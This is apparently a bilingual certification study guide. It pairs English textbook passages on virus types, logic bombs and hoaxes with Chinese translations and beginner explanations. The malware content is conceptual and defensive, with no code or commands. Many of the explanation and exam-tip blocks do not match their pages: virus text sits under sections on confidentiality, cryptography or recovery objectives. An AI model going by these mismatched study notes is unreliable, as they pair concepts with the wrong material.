这类代码编写者的例子,请参见本章后面的侧边栏“RTM 与互联网蠕虫”。 现代社会催生了脚本小子——这类恶意个体并不理解安全漏洞背后的技术,却 从互联网下载现成的软件(或脚本)来攻击远程系统。 这一趋势催生了一种新 型病毒创建软件,使得任何具备最低技术水平的人都能创建病毒并将其释放到 互联网上。 这一点体现在反病毒专家迄今为止记录的大量病毒中。 这些业余的 恶意代码开发者通常只是在尝试他们下载的新工具,或试图给一两个敌人制造 麻烦。 不幸的是,恶意软件有时会迅速传播,给广大互联网用户带来问题。 此外,脚本小子所使用的工具也免费提供给那些具有更恶劣犯罪意图的人。 事 实上,已知国际有组织犯罪集团在恶意软件传播中扮演了角色。 这些犯罪分子 位于执法机制薄弱的国家,利用恶意软件窃取全球各地人士的钱财和身份信息, 尤其是美国居民。 事实上,Zeus特洛伊木马被广泛认为是东欧有组织犯罪集团 的产物,该集团旨在感染尽可能多的系统,以记录键盘输入并窃取在线银行密 码。 Zeus首次出现于2007年,但至今仍在不断更新,并不断出现新的变种。 恶意软件开发的最新趋势伴随着高级持续性威胁(APT)的兴起而来。

APT是 具有高超技术能力和雄厚资金支持的复杂对手。 这些攻击者通常是军事单位、 情报机构或与政府机构有关联的隐秘组织。 APT攻击者与其他恶意软件作者的 关键区别之一在于,这些恶意软件开发者通常能够访问软件供应商尚未知晓的 零日漏洞。 由于供应商对这一漏洞毫不知情,因此没有补丁可用,该漏洞的利 用效果极为高效。 APT开发的恶意软件具有高度针对性,旨在仅影响少量敌对 系统(有时甚至只有一个),且难以防范。 在本章后续内容中,您将了解到震 网病毒,这是APT开发的恶意软件的一个例子。 病毒

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 04 / PDF P1398

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

The computer virus is perhaps the earliest form of malicious code to plague security administrators. Indeed, viruses are so prevalent nowadays that major outbreaks receive attention from the mass media and provoke mild hysteria among average computer users. According to statistics compiled by AV-Test, an independent cybersecurity research organization, there were over 1.347 billion strains of malicious code roaming the global network since1984, and this trend only continues with 5,900,949 new malware appearing on the Internet in the first two weeks of 2024! Hundreds of thousands of variations of these viruses strike unsuspecting computer users each day.

Many carry malicious payloads that cause damage, ranging in scope from displaying a profane message on the screen all the way to causing complete destruction of all data stored on the local hard drive. Like biological viruses, computer viruses have two main functions— propagation and payload execution. Miscreants who create viruses carefully design code to implement these functions in new and innovative methods that they hope escape detection and bypass increasingly sophisticated antivirus technology. It's fair to say that an arms race has developed between virus writers and antivirus technicians, each hoping to develop technology one step ahead of the other.

The propagation function defines how the virus will spread from system to system, infecting each machine it leaves in its wake. A virus's payload delivers whatever malicious activity the virus writer had in mind. This could be anything that negatively impacts the confidentiality, integrity, or availability of systems or data. Virus Propagation Techniques By definition, a virus must contain technology that enables it to spread from system to system, aided by unsuspecting computer users seeking to share data by exchanging disks, sharing networked resources, sending email, or using some other means.

Once they've “touched” a new system, they use one of several propagation techniques to infect the new victim and expand their reach. In this section, we'll look at four common propagation techniques: Master Boot Record Viruses The master boot record (MBR) virus is one of the earliest known forms of virus infection. These viruses attack the MBR —the portion of bootable media (such as a hard disk or flash drive) that the computer uses to load the operating system during the boot process. Because the MBR is extremely small (usually 512 bytes), it can't contain all the code required to implement the virus's propagation and destructive functions.

To bypass this space limitation, MBR viruses store the majority of their code on

中文直译 / 整理

计算机病毒或许是最早困扰安全管理员的恶意代码形式。 事实上,如今病毒如 此普遍,重大疫情甚至会引发主流媒体的关注,并令普通计算机用户产生轻微 恐慌。 根据独立网络安全研究组织AV‑Test统计的数据,自1984年以来,全球 网络上已出现超过13.47亿种恶意代码,而这一趋势仍在持续——仅在2024年的 前两周,互联网上就出现了5,900,949种新型恶意软件! 每天都有数十万种病毒 变种袭击毫无防备的计算机用户。 许多病毒携带恶意有效载荷,造成的损害范 围从在屏幕上显示粗俗信息,到彻底摧毁本地硬盘上存储的所有数据不等。 与生物病毒类似,计算机病毒具有两大主要功能——传播和有效载荷执行。 病 毒创作者精心设计代码,以新颖且创新的方式实现这些功能,希望逃避检测并 绕过日益复杂的反病毒技术。 可以说,病毒编写者与反病毒技术人员之间已形 成一场军备竞赛,双方都希望开发出领先对方一步的技术。 传播功能定义了病 毒如何从一个系统传播到另一个系统,在其留下的每个机器上进行感染。 病毒 的有效载荷则实现病毒编写者所设想的任何恶意活动,可能对系统的机密性、 完整性或可用性造成任何负面影响。

病毒传播技术 根据定义,病毒必须包含使其能够在系统间传播的技术,这一过程通常借助不 知情的计算机用户通过交换磁盘、共享网络资源、发送电子邮件或其他方式共 享数据来实现。 一旦它们“接触”到新系统,便会使用多种传播技术之一感染 新目标并扩大其影响范围。 在本节中,我们将介绍四种常见的传播技术: 主引导记录病毒 主引导记录(MBR)病毒 是最早已知的病毒感染形式之一。 这些病毒攻击 MBR——即计算机在启动过程中用于加载操作系统的可启动介质 (如硬盘或闪存驱动器)的一部分。 由于 MBR 非常小(通常为 512 字节), 它无法包含实现病毒传播和破坏功能所需的所有代码。 为了绕过这一空间限制, MBR 病毒将大部分代码存储在

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
NIST NIST 提供美国常用安全标准、框架和指南。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 05 / PDF P1399

第 1399 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

another portion of the storage media. When the system reads the infected MBR, the virus instructs it to read and execute the code stored in this alternate location, thereby loading the entire virus into memory and potentially triggering the delivery of the virus's payload. The Boot Sector and the Master Boot Record You'll often see the terms boot sector and master boot record used interchangeably to describe the portion of a storage device used to load the operating system and the types of viruses that attack that process. This is not technically correct. The MBR is a single disk sector, normally the first sector of the media that is read in the initial stages of the boot process.

The MBR determines which media partition contains the operating system and then directs the system to read that partition's boot sector to load the operating system. Viruses can attack both the MBR and the boot sector, with substantially similar results. MBR viruses act by redirecting the system to an infected boot sector, which loads the virus into memory before loading the operating system from the legitimate boot sector. Boot sector viruses actually infect the legitimate boot sector and are loaded into memory during the operating system load process. Most MBR viruses are spread between systems through the use of infected media inadvertently shared between users.

If the infected media is in the drive during the boot process, the target system reads the infected MBR, and the virus loads into memory, infects the MBR on the target system's hard drive, and spreads its infection to yet another machine. Many different controls protect against MBR viruses, including the use of a Trusted Platform Module (TPM) and other secure boot technologies. Those were discussed in Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures.” File Infector Viruses Many viruses infect different types of executable files and trigger when the operating system attempts to execute them.

For Windows-based systems, file infector viruses commonly affect executable files and scripts, such as those ending with .exe, .com, and .msc extensions. The propagation routines of file infector viruses may slightly alter the code of an executable program, thereby implanting the technology the virus needs to replicate and damage the system. In some cases, the virus might actually replace the entire file with an infected version. Standard file infector viruses

中文直译 / 整理

存储介质的另一部分。 当系统读取被感染的 MBR 时,病毒会指示其读取并 执行存储在此备用位置的代码,从而将整个病毒加载到内存中,并可能触 发病毒的有效载荷。 引导扇区和主引导记录 您经常会看到术语 引导扇区 和 主引导记录 被互换使用,以描述用于加载 操作系统以及攻击该过程的病毒的存储设备部分。 这在技术上是不正确的。 MBR 是一个单独的磁盘扇区,通常是启动过程初期读取的媒体的第一个扇 区。 MBR 确定哪个磁盘分区包含操作系统,然后引导系统读取该分区的引 导扇区以加载操作系统。 病毒可以攻击 MBR 和引导扇区,其结果基本相似。 MBR 病毒通过将系 统重定向到被感染的引导扇区来发挥作用,该扇区在从合法引导扇区加载 操作系统之前将病毒加载到内存中。 引导扇区病毒则直接感染合法的引导 扇区,并在操作系统加载过程中被加载到内存中。 大多数 MBR 病毒通过用户之间无意共享的受感染介质在系统间传播。 如果在 启动过程中受感染的介质位于驱动器中,目标系统将读取受感染的 MBR,病 毒将加载到内存中,感染目标系统硬盘上的 MBR,并将其感染传播到另一台 机器。

许多不同的控制措施可防范 MBR 病毒,包括使用可信平台模块( TPM)和其他安全启动技术。 这些内容已在 第 9 章“安全漏洞、威胁与对策” 中讨论过。 文件感染型病毒 许多病毒会感染不同类型的可执行文件,并在操作系统尝试执 行它们时触发。 对于基于Windows的系统,文件感染型病毒通常会影响可执行 文件和脚本,例如以.exe、.com和.msc为扩展名的文件。 文件感染型病毒的传播 机制可能会轻微修改可执行程序的代码,从而植入病毒复制和破坏系统所需的技 术。 在某些情况下,病毒甚至可能用感染版本完全替换整个文件。 标准的文件感 染型病毒

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1399 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 06 / PDF P1400

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

that do not use cloaking techniques such as stealth or encryption (see the section “Virus Technologies,” later in this chapter) are often easily detected by comparing file characteristics (such as size and modification date) before and after infection or by comparing hash values. The section “Anti-malware Software” provides technical details of these techniques. A variation of the file infector virus is the companion virus. These viruses are self-contained executable files that escape detection by using a filename similar to, but slightly different from, a legitimate operating system file.

They rely on the default filename extensions that Windows-based operating systems append to commands when executing program files (.com, .exe, and .bat, in that order). For example, if you had a program on your hard disk named game.exe, a companion virus might use the name game.com. If you then open a command prompt and simply type GAME, the operating system would execute the virus file, game.com, instead of the file you actually intended to execute, game.exe. This is a very good reason to avoid shortcuts and fully specify the name of the file you want to execute.

Macro Viruses Many common software applications implement some sort of scripting functionality to assist with the automation of repetitive tasks. These functionalities often use simple yet powerful programming languages such as Visual Basic for Applications (VBA). Although macros do indeed offer great productivity-enhancing opportunities to computer users, they also expose systems to yet another avenue of infection—macro viruses. Macro viruses first appeared on the scene in the mid-1990s, utilizing rudimentary technologies to infect documents created in the popular Microsoft Word environment.

Although they were relatively unsophisticated, these viruses spread rapidly because the antivirus community didn't anticipate them, and therefore antivirus applications didn't provide any defense against them. Macro viruses quickly became more and more commonplace, and vendors rushed to modify their antivirus platforms to scan application documents for malicious macros. In 1999, the Melissa virus spread through the use of a Word document that exploited a security vulnerability in Microsoft Outlook to replicate.

The infamous I Love You virus quickly followed on its heels, exploiting similar vulnerabilities in early 2000, showing us that fast-spreading viruses have plagued us for over 20 years.

中文直译 / 整理

不使用隐蔽技术(如潜伏或加密,参见本章后续的“病毒技术”部分)的病 毒,通常可以通过比较感染前后文件特征(如大小和修改日期)或比较哈希 值来轻松检测。 有关这些技术的技术细节,请参见“反恶意软件”部分。 文件感染病毒的一种变体是伴随病毒。 这些病毒是自包含的可执行文件,通过 使用与合法操作系统文件相似但略有不同的文件名来逃避检测。 它们依赖于基 于Windows的操作系统在执行程序文件时附加的默认文件扩展名(按顺序为. com、.exe和.bat)。 例如,如果您的硬盘上有一个名为game.exe的程序,一个 伴随病毒可能会使用名称game.com。 如果您随后打开命令提示符并仅输入GAME, 操作系统将执行病毒文件game.com,而不是您实际想要执行的文件game.exe。 这是避免使用快捷方式并完全指定要执行的文件名称的充分理由。 宏病毒 许多常见的软件应用程序都实现了某种脚本功能,以帮助自动化重复性任 务。 这些功能通常使用简单而强大的编程语言,例如Visual Basic for Applications(VBA)。 尽管宏确实为计算机用户提供了极大的生产力提升机会, 但它们也使系统面临另一种感染途径——宏病毒。

宏病毒最早出现在20世纪90年代中期,利用原始的技术感染在流行的 Microsoft Word环境中创建的文档。 尽管这些病毒相对简单,但由于防病毒 社区未能预料到它们的存在,因此防病毒应用程序未能提供任何防护,导致它 们迅速传播。 宏病毒很快变得越来越普遍,厂商们急忙修改其防病毒平台,以 扫描应用程序文档中的恶意宏。 1999年,Melissa病毒通过一个利用 Microsoft Outlook安全漏洞进行复制的Word文档传播。 臭名昭著的“ ILOVEYOU”病毒紧随其后,在2000年初利用类似的漏洞传播,向我们展示 了快速传播的病毒已经困扰我们超过20年。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 07 / PDF P1401

第 1401 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Macro viruses proliferate because of the ease of writing code in the scripting languages (such as VBA) used by modern productivity applications. After a rash of macro viruses in the late part of the 20th century, productivity software developers made important changes to the macro development environment, restricting the ability of untrusted macros to run without explicit user permission. This resulted in a drastic reduction in the prevalence of macro viruses.

Service Injection Viruses Recent outbreaks of malicious code use yet another technique to infect systems and escape detection—injecting themselves into trusted runtime processes of the operating system, such as svchost.exe, winlogon.exe, and explorer.exe. By successfully compromising these trusted processes, the malicious code is able to bypass detection by any antivirus software running on the host. One of the best techniques to protect systems against service injection is to ensure that all software allowing the viewing of web content (e.g., browsers, media players, helper applications) receives current security patches.

Virus Technologies As virus detection and eradication technology rises to meet new threats programmed by malicious developers, new kinds of viruses designed to defeat those systems emerge. This section examines four specific types of viruses that use sneaky techniques in an attempt to escape detection: Multipartite Viruses Multipartite viruses use more than one propagation technique in an attempt to penetrate systems that defend against only one method or the other. For example, a virus might infect critical COM and EXE files by adding malicious code to each file. This characteristic qualifies it as a file infector virus.

Then the same virus might write malicious code to the system's master boot record, qualifying it as a boot sector virus. Stealth Viruses Stealth viruses hide themselves by actually tampering with the operating system to fool antivirus packages into thinking that everything is functioning normally. For example, a stealth boot sector virus might overwrite the system's master boot record with malicious code but then also modify the operating system's file access functionality to cover its

中文直译 / 整理

宏病毒之所以广泛传播,是因为现代生产力应用程序使用的脚本语言 (如VBA)编写代码非常容易。 在20世纪后期出现了一系列宏病毒后,生产力软件开发者对宏开发环境进 行了重要改进,限制了未经信任的宏在未经用户明确许可的情况下运行的 能力。 这导致宏病毒的流行程度大幅下降。 服务注入病毒 最近爆发的恶意代码采用了另一种技术来感染系统并逃避检测—— 将自身注入操作系统的可信运行进程,例如 svchost.exe、winlogon.exe 和 explorer.exe。 通过成功入侵这些可信进程,恶意代码能够绕过主机上运行的任 何防病毒软件的检测。 保护系统免受服务注入的最佳技术之一是确保所有允许查 看网页内容的软件(例如浏览器、媒体播放器、辅助应用程序)都及时获得安全 补丁。 病毒技术 随着病毒检测和清除技术不断发展以应对恶意开发者编程的新威胁,新的病毒 类型也随之出现,旨在击败这些防护系统。 本节将探讨四种使用隐蔽技术试图 逃避检测的特定病毒类型: 多部分病毒 多部分病毒 使用多种传播技术,试图渗透仅防御其中一种方法的系 统。 例如,病毒可能通过在每个文件中添加恶意代码来感染关键的 COM 和 EXE 文件。

这一特性使其成为文件感染型病毒。 然后,同一病毒可能将恶意代码 写入系统的主引导记录,使其成为引导扇区病毒。 潜伏病毒 潜伏病毒 通过实际篡改操作系统来隐藏自身,欺骗杀毒软件,使其 误以为一切运行正常。 例如,一个潜伏的引导扇区病毒可能会用恶意代码覆盖 系统的主引导记录,但同时修改操作系统的文件访问功能以掩盖其

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1401 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 08 / PDF P1402

第 1402 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

tracks. When the antivirus package requests a copy of the MBR, the modified operating system code provides it with exactly what the antivirus package expects to see—a clean version of the MBR free of any virus signatures. However, when the system boots, it reads the infected MBR and loads the virus into memory. Polymorphic Viruses Polymorphic viruses actually modify their own code as they travel from system to system. The virus's propagation and destruction techniques remain the same, but the signature of the virus is somewhat different each time it infects a new system.

It is the hope of polymorphic virus creators that this constantly changing signature will render signature-based antivirus packages useless. However, antivirus vendors have “cracked the code” of many polymorphic techniques, so current versions of antivirus software are able to detect known polymorphic viruses. However, it tends to take vendors longer to generate the necessary signature files to stop a polymorphic virus in its tracks, which means the virus can run free on the Internet for a longer time. Encrypted Viruses Encrypted viruses use cryptographic techniques, such as those described in Chapter 6, “Cryptography and Symmetric Key Algorithms,” to avoid detection.

Encrypted viruses alter the way they are stored on the disk. Encrypted viruses use a very short segment of code, known as the virus decryption routine, which contains the cryptographic information necessary to load and decrypt the main virus code stored elsewhere on the disk. Each infection utilizes a different cryptographic key, causing the main code to appear completely different on each system. However, the virus decryption routines often contain telltale signatures that render them vulnerable to updated antivirus software packages. Hoaxes No discussion of viruses is complete without mentioning the nuisance and wasted resources caused by virus hoaxes.

Almost every email user has, at one time or another, received a message forwarded by a friend or relative that warns of the latest virus threat roaming the Internet. Invariably, this purported “virus” is the most destructive virus ever unleashed, and no antivirus package is able to detect or eradicate it. Changes in the social media landscape have simply changed the way these hoaxes circulate. In addition to email messages, malware hoaxes now

中文直译 / 整理

踪迹。 当杀毒软件请求获取MBR的副本时,被修改的操作系统代码会提供其期 望看到的内容——一个不含任何病毒特征的干净MBR版本。 然而,当系统启动 时,它会读取被感染的MBR并将病毒加载到内存中。 多态病毒 多态病毒 在从一个系统传播到另一个系统时会修改自身的代码。 病毒的 传播和破坏机制保持不变,但每次感染新系统时,其病毒特征都会略有不同。 多 态病毒的创造者希望这种不断变化的特征能使基于特征签名的杀毒软件失效。 然 而,杀毒厂商已经“破解”了多种多态技术,因此当前版本的杀毒软件能够检测 出已知的多态病毒。 不过,厂商通常需要更长时间才能生成必要的特征文件以阻 止多态病毒的传播,这意味着该病毒可以在互联网上更长时间地自由传播。 加密病毒 加密病毒 使用加密技术,例如 第6章“加密学与对称密钥算法”中所 述的技术,以避免被检测。 加密病毒改变了其在磁盘上的存储方式。 加密病毒使 用一小段称为 病毒解密例程 的代码,其中包含加载和解密存储在磁盘其他位置 的主病毒代码所需的加密信息。 每次感染都会使用不同的加密密钥,导致主代码 在每个系统上看起来完全不同。

然而,病毒解密例程通常包含明显的特征签名, 使其容易被更新的杀毒软件包检测到。 骗局 任何关于病毒的讨论都离不开提及病毒骗局所带来的困扰和资源浪费。 几乎每 个电子邮件用户都曾收到过朋友或亲属转发的消息,警告他们互联网上正肆虐 着最新的病毒威胁。 这类所谓的“病毒” invariably 是有史以来最具破坏性的 病毒,没有任何杀毒软件能够检测或清除它。 社交媒体格局的变化仅仅改变了这些谣言的传播方式。 除了电子邮件外,恶意 软件谣言现在

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1402 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 09 / PDF P1403

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

circulate via Facebook, WhatsApp, Snapchat, and other social media and messaging platforms. For more information on this topic, the myth-tracking website Snopes maintains a virus hoax list at www.snopes.com/tag/virus-hoaxes-realities. Logic Bombs Logic bombs are malicious code objects that infect a system and lie dormant until they are triggered by the occurrence of one or more conditions such as time, program launch, website logon, certain keystrokes, and so on. The vast majority of logic bombs are programmed into custom-built applications by software developers seeking to ensure that their work is destroyed if they unexpectedly leave the company. Logic bombs come in many shapes and sizes.

Indeed, many viruses and Trojan horses contain a logic bomb component. A logic bomb targeted organizations in South Korea in March 2013. This malware infiltrated systems belonging to South Korean media companies and financial institutions and caused both system outages and the loss of data. In this case, the malware attack triggered a military alert when the South Korean government suspected that the logic bomb was the prelude to an attack by North Korea. Logic bombs may also be integrated deeply within an existing system by a malicious developer, rather than being independent code objects.

For example, in July 2019, a contractor working for the Siemens Corporation pled guilty to including a logic bomb in software that he created under that contract. The point of the logic bomb was to periodically break the software, requiring that Siemens hire him again to fix the problem, guaranteeing him a steady stream of business. He successfully carried out his scheme for more than two years before being caught and sentenced to a six-month prison term. Trojan Horses System administrators constantly warn computer users not to download and install software from the Internet unless they are absolutely sure it comes from a trusted source.

In fact, many companies strictly prohibit the installation of any software not prescreened by the IT department. These policies serve to minimize the risk that an organization's network will be compromised by a Trojan horse—a software program that appears benevolent

中文直译 / 整理

